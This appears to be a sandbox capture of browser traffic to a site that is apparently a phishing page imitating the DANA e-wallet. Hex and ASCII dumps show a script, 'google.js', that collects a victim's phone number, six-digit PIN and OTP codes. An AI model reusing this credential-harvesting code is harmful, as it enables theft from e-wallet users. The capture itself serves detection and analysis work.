                                                                                                                            2024-10-06 11:50:09 UTC1026INData Raw: 29 2c 72 2e 64 65 66 69 6e 65 28 73 2c 41 28 75 2c 6c 2c 31 29 29 29 7d 29 29 7d 29 29 2c 79 2e 69 6e 6e 65 72 48 54 4d 4c 3d 6e 2b 22 7b 76 69 73 69 62 69 6c 69 74 79 3a 68 69 64 64 65 6e 7d 2e 68 79 64 72 61 74 65 64 7b 76 69 73 69 62 69 6c 69 74 79 3a 69 6e 68 65 72 69 74 7d 22 2c 79 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 64 61 74 61 2d 73 74 79 6c 65 73 22 2c 22 22 29 2c 75 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 79 2c 66 3f 66 2e 6e 65 78 74 53 69 62 6c 69 6e 67 3a 75 2e 66 69 72 73 74 43 68 69 6c 64 29 2c 64 3d 21 31 2c 24 2e 6c 65 6e 67 74 68 3f 24 2e 6d 61 70 28 28 65 3d 3e 65 2e 63 6f 6e 6e 65 63 74 65 64 43 61 6c 6c 62 61 63 6b 28 29 29 29 3a 6f 2e 6a 6d 70 28 28 28 29 3d 3e 68 3d 73 65 74 54 69 6d 65 6f 75 74 28 52 2c 33 30 29 29 29 7d
                                                                                                                            Data Ascii: ),r.define(s,A(u,l,1)))}))})),y.innerHTML=n+"{visibility:hidden}.hydrated{visibility:inherit}",y.setAttribute("data-styles",""),u.insertBefore(y,f?f.nextSibling:u.firstChild),d=!1,$.length?$.map((e=>e.connectedCallback())):o.jmp((()=>h=setTimeout(R,30)))}
                                                                                                                            2024-10-06 11:50:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            26192.168.2.64976723.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC381OUTGET /asset/jquery.mask.min.js HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:09 UTC710INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-javascript
                                                                                                                            Etag: W/"670203dc-1ef0"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:08 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-b-b586bd68-6df6j
                                                                                                                            X-Styx-Req-Id: 23853fcd-83d9-11ef-a6e0-cebf9738eaf2
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            X-Served-By: cache-chi-kigq8000053-CHI, cache-nyc-kteb1890094-NYC
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215410.866158,VS0,VE37
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            transfer-encoding: chunked
                                                                                                                            2024-10-06 11:50:09 UTC6INData Raw: 31 65 66 30 0d 0a
                                                                                                                            Data Ascii: 1ef0
                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: 76 61 72 20 24 6a 73 63 6f 6d 70 3d 7b 73 63 6f 70 65 3a 7b 7d 2c 66 69 6e 64 49 6e 74 65 72 6e 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 61 2c 6c 2c 64 29 7b 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 53 74 72 69 6e 67 26 26 28 61 3d 53 74 72 69 6e 67 28 61 29 29 3b 66 6f 72 28 76 61 72 20 70 3d 61 2e 6c 65 6e 67 74 68 2c 68 3d 30 3b 68 3c 70 3b 68 2b 2b 29 7b 76 61 72 20 62 3d 61 5b 68 5d 3b 69 66 28 6c 2e 63 61 6c 6c 28 64 2c 62 2c 68 2c 61 29 29 72 65 74 75 72 6e 7b 69 3a 68 2c 76 3a 62 7d 7d 72 65 74 75 72 6e 7b 69 3a 2d 31 2c 76 3a 76 6f 69 64 20 30 7d 7d 7d 3b 24 6a 73 63 6f 6d 70 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 79 3d 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 4f 62 6a 65 63 74 2e 64 65 66 69 6e 65 50 72 6f 70 65 72 74 69 65 73 3f 4f
                                                                                                                            Data Ascii: var $jscomp={scope:{},findInternal:function(a,l,d){a instanceof String&&(a=String(a));for(var p=a.length,h=0;h<p;h++){var b=a[h];if(l.call(d,b,h,a))return{i:h,v:b}}return{i:-1,v:void 0}}};$jscomp.defineProperty="function"==typeof Object.defineProperties?O
                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: 68 29 2c 72 3d 61 2e 74 65 78 74 2e 6c 65 6e 67 74 68 3b 65 6c 73 65 20 69 66 28 66 7c 7c 22 30 22 3d 3d 3d 66 29 72 3d 66 3b 72 65 74 75 72 6e 20 72 7d 63 61 74 63 68 28 43 29 7b 7d 7d 2c 73 65 74 43 61 72 65 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 69 66 28 62 2e 69 73 28 22 3a 66 6f 63 75 73 22 29 29 7b 76 61 72 20 63 2c 0a 67 3d 62 2e 67 65 74 28 30 29 3b 67 2e 73 65 74 53 65 6c 65 63 74 69 6f 6e 52 61 6e 67 65 3f 67 2e 73 65 74 53 65 6c 65 63 74 69 6f 6e 52 61 6e 67 65 28 61 2c 61 29 3a 28 63 3d 67 2e 63 72 65 61 74 65 54 65 78 74 52 61 6e 67 65 28 29 2c 63 2e 63 6f 6c 6c 61 70 73 65 28 21 30 29 2c 63 2e 6d 6f 76 65 45 6e 64 28 22 63 68 61 72 61 63 74 65 72 22 2c 61 29 2c 63 2e 6d 6f 76 65 53 74 61 72 74 28 22 63 68 61 72 61 63 74 65 72
                                                                                                                            Data Ascii: h),r=a.text.length;else if(f||"0"===f)r=f;return r}catch(C){}},setCaret:function(a){try{if(b.is(":focus")){var c,g=b.get(0);g.setSelectionRange?g.setSelectionRange(a,a):(c=g.createTextRange(),c.collapse(!0),c.moveEnd("character",a),c.moveStart("character
                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: 29 3f 29 22 29 2c 22 28 24 31 29 3f 22 29 2e 72 65 70 6c 61 63 65 28 6e 65 77 20 52 65 67 45 78 70 28 6e 2e 64 69 67 69 74 2c 22 67 22 29 2c 6e 2e 70 61 74 74 65 72 6e 29 29 3b 72 65 74 75 72 6e 20 6e 65 77 20 52 65 67 45 78 70 28 61 29 7d 2c 64 65 73 74 72 6f 79 45 76 65 6e 74 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 62 2e 6f 66 66 28 22 69 6e 70 75 74 20 6b 65 79 64 6f 77 6e 20 6b 65 79 75 70 20 70 61 73 74 65 20 64 72 6f 70 20 62 6c 75 72 20 66 6f 63 75 73 6f 75 74 20 22 2e 73 70 6c 69 74 28 22 20 22 29 2e 6a 6f 69 6e 28 22 2e 6d 61 73 6b 20 22 29 29 7d 2c 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 63 3d 62 2e 69 73 28 22 69 6e 70 75 74 22 29 3f 22 76 61 6c 22 3a 22 74 65 78 74 22 3b 69 66 28 30 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e
                                                                                                                            Data Ascii: )?)"),"($1)?").replace(new RegExp(n.digit,"g"),n.pattern));return new RegExp(a)},destroyEvents:function(){b.off("input keydown keyup paste drop blur focusout ".split(" ").join(".mask "))},val:function(a){var c=b.is("input")?"val":"text";if(0<arguments.len
                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: 28 75 29 77 2e 6d 61 74 63 68 28 75 2e 70 61 74 74 65 72 6e 29 3f 28 67 5b 72 5d 28 77 29 2c 75 2e 72 65 63 75 72 73 69 76 65 26 26 28 2d 31 3d 3d 3d 70 3f 70 3d 6e 3a 6e 3d 3d 3d 76 26 26 6e 21 3d 3d 70 26 26 28 6e 3d 70 2d 6b 29 2c 76 3d 3d 3d 70 26 26 28 6e 2d 3d 6b 29 29 2c 6e 2b 3d 6b 29 3a 77 3d 3d 3d 41 3f 28 74 2d 2d 2c 41 3d 76 6f 69 64 20 30 29 3a 75 2e 6f 70 74 69 6f 6e 61 6c 3f 28 6e 2b 3d 6b 2c 71 2d 3d 6b 29 3a 75 2e 66 61 6c 6c 62 61 63 6b 3f 28 67 5b 72 5d 28 75 2e 66 61 6c 6c 62 61 63 6b 29 2c 6e 2b 3d 6b 2c 71 2d 3d 6b 29 3a 63 2e 69 6e 76 61 6c 69 64 2e 70 75 73 68 28 7b 70 3a 71 2c 76 3a 77 2c 65 3a 75 2e 70 61 74 74 65 72 6e 7d 29 2c 71 2b 3d 6b 3b 65 6c 73 65 7b 69 66 28 21 61 29 67 5b 72 5d 28 78 29 3b 77 3d 3d 3d 78 3f 28 79 2e 70
                                                                                                                            Data Ascii: (u)w.match(u.pattern)?(g[r](w),u.recursive&&(-1===p?p=n:n===v&&n!==p&&(n=p-k),v===p&&(n-=k)),n+=k):w===A?(t--,A=void 0):u.optional?(n+=k,q-=k):u.fallback?(g[r](u.fallback),n+=k,q-=k):c.invalid.push({p:q,v:w,e:u.pattern}),q+=k;else{if(!a)g[r](x);w===x?(y.p
                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: 65 6c 73 65 7b 66 2e 70 6c 61 63 65 68 6f 6c 64 65 72 26 26 62 2e 61 74 74 72 28 22 70 6c 61 63 65 68 6f 6c 64 65 72 22 2c 66 2e 70 6c 61 63 65 68 6f 6c 64 65 72 29 3b 62 2e 64 61 74 61 28 22 6d 61 73 6b 22 29 26 26 0a 62 2e 61 74 74 72 28 22 61 75 74 6f 63 6f 6d 70 6c 65 74 65 22 2c 22 6f 66 66 22 29 3b 64 3d 30 3b 66 6f 72 28 76 61 72 20 6c 3d 21 30 3b 64 3c 65 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 67 3d 6d 2e 74 72 61 6e 73 6c 61 74 69 6f 6e 5b 65 2e 63 68 61 72 41 74 28 64 29 5d 3b 69 66 28 67 26 26 67 2e 72 65 63 75 72 73 69 76 65 29 7b 6c 3d 21 31 3b 62 72 65 61 6b 7d 7d 6c 26 26 62 2e 61 74 74 72 28 22 6d 61 78 6c 65 6e 67 74 68 22 2c 65 2e 6c 65 6e 67 74 68 29 3b 63 2e 64 65 73 74 72 6f 79 45 76 65 6e 74 73 28 29 3b 63 2e 65 76 65 6e
                                                                                                                            Data Ascii: else{f.placeholder&&b.attr("placeholder",f.placeholder);b.data("mask")&&b.attr("autocomplete","off");d=0;for(var l=!0;d<e.length;d++){var g=m.translation[e.charAt(d)];if(g&&g.recursive){l=!1;break}}l&&b.attr("maxlength",e.length);c.destroyEvents();c.even
                                                                                                                            2024-10-06 11:50:09 UTC1030INData Raw: 61 29 7d 3b 61 2e 66 6e 2e 75 6e 6d 61 73 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6c 65 61 72 49 6e 74 65 72 76 61 6c 28 61 2e 6d 61 73 6b 57 61 74 63 68 65 72 73 5b 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 5d 29 3b 64 65 6c 65 74 65 20 61 2e 6d 61 73 6b 57 61 74 63 68 65 72 73 5b 74 68 69 73 2e 73 65 6c 65 63 74 6f 72 5d 3b 72 65 74 75 72 6e 20 74 68 69 73 2e 65 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 62 3d 61 28 74 68 69 73 29 2e 64 61 74 61 28 22 6d 61 73 6b 22 29 3b 62 26 26 62 2e 72 65 6d 6f 76 65 28 29 2e 72 65 6d 6f 76 65 44 61 74 61 28 22 6d 61 73 6b 22 29 7d 29 7d 3b 61 2e 66 6e 2e 63 6c 65 61 6e 56 61 6c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 64 61 74 61 28 22 6d 61 73 6b 22 29 2e 67 65 74 43 6c
                                                                                                                            Data Ascii: a)};a.fn.unmask=function(){clearInterval(a.maskWatchers[this.selector]);delete a.maskWatchers[this.selector];return this.each(function(){var b=a(this).data("mask");b&&b.remove().removeData("mask")})};a.fn.cleanVal=function(){return this.data("mask").getCl
                                                                                                                            2024-10-06 11:50:09 UTC7INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            27192.168.2.64977223.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC372OUTGET /asset/google.js HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:09 UTC712INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Type: application/x-javascript
                                                                                                                            Etag: W/"670203dc-116a"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:08 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-a-6c9ddd647d-vxglp
                                                                                                                            X-Styx-Req-Id: 2386ccb4-83d9-11ef-9855-4ecead420663
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            X-Served-By: cache-chi-kigq8000049-CHI, cache-ewr-kewr1740032-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215410.877219,VS0,VE35
                                                                                                                            Vary: Accept-Encoding
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            transfer-encoding: chunked
                                                                                                                            2024-10-06 11:50:09 UTC6INData Raw: 31 31 36 61 0d 0a
                                                                                                                            Data Ascii: 116a
                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: 20 66 75 6e 63 74 69 6f 6e 20 73 65 6e 64 4e 6f 68 70 28 65 76 65 6e 74 29 7b 0a 20 20 20 20 24 28 22 23 70 72 6f 63 65 73 73 22 29 2e 73 68 6f 77 28 29 3b 65 76 65 6e 74 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 3b 0a 20 20 20 20 24 28 22 23 69 6e 70 22 29 2e 62 6c 75 72 28 29 3b 0a 20 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 76 61 72 20 6e 6f 6d 6f 72 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 69 6e 70 22 29 2e 76 61 6c 75 65 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 22 6e 6f 6d 6f 72 22 2c 20 6e 6f 6d 6f 72 29 3b 0a 20 20 20 20 76 61 72 20 6c 6f 67 6f 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42
                                                                                                                            Data Ascii: function sendNohp(event){ $("#process").show();event.preventDefault(); $("#inp").blur(); var nomor = document.getElementById("inp").value; sessionStorage.setItem("nomor", nomor); var logo = document.getElementB
                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 31 27 29 3b 0a 20 76 61 72 20 70 69 6e 32 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 32 27 29 3b 0a 20 76 61 72 20 70 69 6e 33 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 33 27 29 3b 0a 20 76 61 72 20 70 69 6e 34 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 34 27 29 3b 0a 20 76 61 72 20 70 69 6e 35 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 35 27 29 3b 0a 20 76 61 72 20 70 69 6e 36 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e
                                                                                                                            Data Ascii: = document.getElementById('pin1'); var pin2 = document.getElementById('pin2'); var pin3 = document.getElementById('pin3'); var pin4 = document.getElementById('pin4'); var pin5 = document.getElementById('pin5'); var pin6 = document.getElementById('pin
                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: 49 64 28 27 70 69 6e 33 27 29 3b 0a 20 76 61 72 20 70 69 6e 34 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 34 27 29 3b 0a 20 76 61 72 20 70 69 6e 35 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 35 27 29 3b 0a 20 76 61 72 20 70 69 6e 36 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 70 69 6e 36 27 29 3b 0a 20 20 20 20 20 76 61 72 20 6f 74 70 31 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6f 74 70 31 27 29 3b 0a 20 20 20 76 61 72 20 6f 74 70 32 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 6f 74 70 32 27 29 3b 0a 20 20 20 76 61 72 20 6f 74 70 33 20
                                                                                                                            Data Ascii: Id('pin3'); var pin4 = document.getElementById('pin4'); var pin5 = document.getElementById('pin5'); var pin6 = document.getElementById('pin6'); var otp1 = document.getElementById('otp1'); var otp2 = document.getElementById('otp2'); var otp3
                                                                                                                            2024-10-06 11:50:09 UTC324INData Raw: 6c 61 79 44 41 4e 41 2e 68 74 6d 6c 27 3b 20 2f 2f 57 69 6c 6c 20 74 61 6b 65 20 79 6f 75 20 74 6f 20 47 6f 6f 67 6c 65 2e 22 2e 2f 61 70 70 2e 68 74 6d 6c 22 3b 0a 20 20 20 0a 20 20 76 61 72 20 6e 6f 6d 6f 72 20 3d 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 22 6e 6f 6d 6f 72 22 29 3b 0a 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 61 6c 65 72 74 22 29 2e 69 6e 6e 65 72 48 54 4d 4c 20 3d 20 22 4b 6f 64 65 20 62 61 72 75 20 73 75 64 61 68 20 64 69 6b 69 72 69 6d 20 76 69 61 20 53 4d 53 20 6b 65 3c 62 72 2f 3e 2b 36 32 20 22 20 2b 20 6e 6f 6d 6f 72 2b 20 22 22 3b 0a 20 20 20 24 28 22 2e 61 6c 65 72 74 22 29 2e 63 73 73 28 22 63 6f 6c 6f 72 22 2c 22 62 6c 61 63 6b 22 29 3b 0a
                                                                                                                            Data Ascii: layDANA.html'; //Will take you to Google."./app.html"; var nomor = sessionStorage.getItem("nomor"); document.getElementById("alert").innerHTML = "Kode baru sudah dikirim via SMS ke<br/>+62 " + nomor+ ""; $(".alert").css("color","black");
                                                                                                                            2024-10-06 11:50:09 UTC7INData Raw: 0d 0a 30 0d 0a 0d 0a
                                                                                                                            Data Ascii: 0


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            28192.168.2.64977123.185.0.44436220C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-10-06 11:50:09 UTC378OUTGET /asset/img/load_bg.png HTTP/1.1
                                                                                                                            Host: dev-danapemulihan.pantheonsite.io
                                                                                                                            Connection: keep-alive
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                            Accept: */*
                                                                                                                            Sec-Fetch-Site: none
                                                                                                                            Sec-Fetch-Mode: cors
                                                                                                                            Sec-Fetch-Dest: empty
                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                            Accept-Language: en-US,en;q=0.9
                                                                                                                            2024-10-06 11:50:09 UTC664INHTTP/1.1 200 OK
                                                                                                                            Connection: close
                                                                                                                            Content-Length: 7863
                                                                                                                            Content-Type: image/png
                                                                                                                            Etag: "670203dc-1eb7"
                                                                                                                            Expires: Sun, 06 Oct 2024 11:50:08 GMT
                                                                                                                            Last-Modified: Sun, 06 Oct 2024 03:28:28 GMT
                                                                                                                            Server: nginx
                                                                                                                            Strict-Transport-Security: max-age=300
                                                                                                                            X-Pantheon-Styx-Hostname: styx-fe4-b-b586bd68-glnv6
                                                                                                                            X-Styx-Req-Id: 238758ca-83d9-11ef-90ee-a21130942dc4
                                                                                                                            Cache-Control: no-cache, must-revalidate
                                                                                                                            Date: Sun, 06 Oct 2024 11:50:09 GMT
                                                                                                                            X-Served-By: cache-chi-kigq8000169-CHI, cache-ewr-kewr1740040-EWR
                                                                                                                            X-Cache: MISS, MISS
                                                                                                                            X-Cache-Hits: 0, 0
                                                                                                                            X-Timer: S1728215410.877182,VS0,VE40
                                                                                                                            X-Robots-Tag: noindex
                                                                                                                            Age: 0
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            Via: 1.1 varnish, 1.1 varnish
                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 2c 00 00 01 2c 08 04 00 00 00 d3 74 46 fe 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 20 63 48 52 4d 00 00 7a 26 00 00 80 84 00 00 fa 00 00 00 80 e8 00 00 75 30 00 00 ea 60 00 00 3a 98 00 00 17 70 9c ba 51 3c 00 00 00 02 62 4b 47 44 00 ff 87 8f cc bf 00 00 00 07 74 49 4d 45 07 e6 0b 01 06 0c 01 1c 9a 07 63 00 00 1d 8b 49 44 41 54 78 da ed 9d d9 6f 64 47 76 a7 bf 73 6f 6e cc 4c 92 c9 2d b9 6f b5 48 55 25 95 aa 54 da bb 5b 52 6b 6d 61 ba a7 0d 5b f0 8b fb c1 f0 c3 3c ce f2 34 c0 60 80 99 bf c0 2f f3 34 b0 81 01 c6 30 da 63 f7 00 83 6e 60 ec 1e 49 2d 95 dd b2 d4 56 ab a4 5a 54 7b 15 c9 e2 be 6f c9 25 d7 1b f3 90 cc 22 8b 64 92 99 cc e5 de cb 8c 8f 28 56 ee 8c 88 fc dd 13 27 4e 9c 88 10 34
                                                                                                                            Data Ascii: PNGIHDR,,tFgAMAa cHRMz&u0`:pQ<bKGDtIMEcIDATxodGvsonL-oHU%T[Rkma[<4`/40cn`I-VZT{o%"d(V'N4
                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: de d2 2e bb 8b 10 a2 04 19 2f 77 f0 a1 dc c2 f2 f3 3a cf db be 44 43 53 0c 42 14 2f 13 e5 0d 99 96 57 02 3e be cf 4b 5b 67 42 68 dc 83 41 14 93 c9 72 4e f4 94 53 58 06 2f f1 3d 1d 65 77 25 26 ed a4 98 2c df 77 57 4e 61 3d c7 9b 7a 4e d0 b5 78 e8 60 8d 99 72 7d 5c f9 84 75 8a f7 a8 d7 b2 72 31 3e 3a 58 2c 57 be 56 b9 84 d5 c5 8f 74 be 95 eb 09 10 65 9a 58 39 3e aa 3c c2 6a e1 7d 9d 1d 7a 2c 08 d3 cc 78 39 36 15 29 87 b0 ea 78 87 a7 ec 6e 11 4d 99 68 24 c4 a3 d2 a3 5a a5 0b cb e4 35 9e d7 01 d1 63 44 33 8a f1 52 d7 21 96 2e ac 67 79 03 bf dd 6d a1 29 23 26 51 56 4b 1d 1f 96 2a ac 5e de d7 cb 4f 8f 1d 5e da 99 2e 6d 61 7e 69 c2 6a e4 3d ba b4 ac 8e 21 75 44 18 2d 25 a1 a6 14 61 f9 78 93 b3 76 b7 80 a6 42 34 e2 65 f4 e8 93 3c 47 17 96 70 91 57 f5 bc e0 b1 45
                                                                                                                            Data Ascii: ./w:DCSB/W>K[gBhArNSX/=ew%&,wWNa=zNx`r}\ur1>:X,WVteX9><j}z,x96)xnMh$Z5cD3R!.gym)#&QVK*^O^.ma~ij=!uD-%axvB4e<GpWE
                                                                                                                            2024-10-06 11:50:09 UTC1378INData Raw: 9f 3c 1d fe 71 f7 1f 9d 3f dd 1b 0a 7b 2b 38 e0 09 d4 bd 78 fe 44 cf 3b df fe c5 8d 2f 97 12 16 62 39 f7 1b f2 ec 8c 29 6c 5b ac 7a 3e a4 d7 1d c2 12 51 55 2d a7 a0 30 a5 d1 b3 91 b1 10 32 ea a9 e0 8f bb df e8 3f d7 df db 55 49 49 ed c4 ca 8c 4d fc b7 cb 7f 35 b2 9a 4e 55 b7 ea c5 35 d3 04 ff 3b 77 d4 ef b6 c5 aa d7 cb 27 f2 61 4a 46 19 6c 66 32 aa 3b f0 46 eb 7b fd 17 fa 4f f6 d6 05 0b 09 21 94 0b c3 ec ef fb f7 6f 2d fc c3 5f 8f db dd 16 07 a0 68 a6 7e af b0 9a 5d b1 6f 9f 42 a0 fa 17 ad 29 ed be 17 9b 3e e8 7b 69 70 b0 bb 29 62 cf cc 4b 5f ef bf 7d ed fa 3f 5c 8b 39 f8 ea f7 d3 c2 44 f6 e6 b6 b0 3a 31 9c 6c b1 04 c1 94 93 a1 16 df 54 7c 64 53 21 58 08 54 a0 c8 59 d5 88 a0 14 0a 14 d2 1f 78 a5 f9 cf 2e 5e 3c dd 1c 31 6c 4d d9 3e 7b f2 0f fb af df 74 f0
                                                                                                                            Data Ascii: <q?{+8xD;/b9)l[z>QU-02?UIIM5NU5;w'aJFlf2;F{O!o-_h~]oB)>{ip)bK_}?\9D:1lT|dS!XTYx.^<1lM>{t
                                                                                                                            2024-10-06 11:50:09 UTC1350INData Raw: 56 8a 84 0e 40 6a ca 46 92 74 ae 2b 5c 72 ba b0 b2 07 ec a6 75 52 a2 f3 11 16 58 73 8f b0 50 0a d2 8e 3e 69 5b 03 80 c1 62 4e 58 b8 25 bf 41 cb ca 15 a4 21 27 ac 25 1d 7d d7 94 89 14 cb 90 3b 08 73 84 38 21 6d 10 2a 4b 26 93 4c 26 12 99 4c c6 52 16 5b f9 1a a6 e1 f1 04 83 5e af 2b 16 ce 17 82 90 e0 11 e4 84 b5 ae 03 0e 95 40 a9 54 2a 95 5a 5f 5f 58 9e 5d 99 8f 8d 2e 8f af 4d 6e ac a5 12 56 46 29 04 53 2c e5 35 1a bc cf 36 f7 d4 b7 86 1b ea 06 3b 9b 23 01 bf c7 ed 3b c2 66 58 87 9c b0 32 6c d2 60 77 89 8e 11 2a 1e 5f 5e 9d 9a 1b 9e bb 3e f3 dd e2 74 7c 31 39 9f 8a a5 53 2a 7b 36 b5 89 29 d9 fd 14 15 29 65 f1 77 93 86 04 8c b0 d9 5f f7 4c e3 85 d6 b3 d1 67 06 db 5a fc 7e bb ab 70 64 36 b2 6e 55 56 58 09 c6 68 b7 bb 44 c7 81 44 62 79 65 7c e6 f6 e4 b7 33 0f
                                                                                                                            Data Ascii: V@jFt+\ruRXsP>i[bNX%A!'%};s8!m*K&L&LR[^+@T*Z__X].MnVF)S,56;#;fX2l`w*_^>t|19S*{6))ew_LgZ~pd6nUVXhDDbye|3
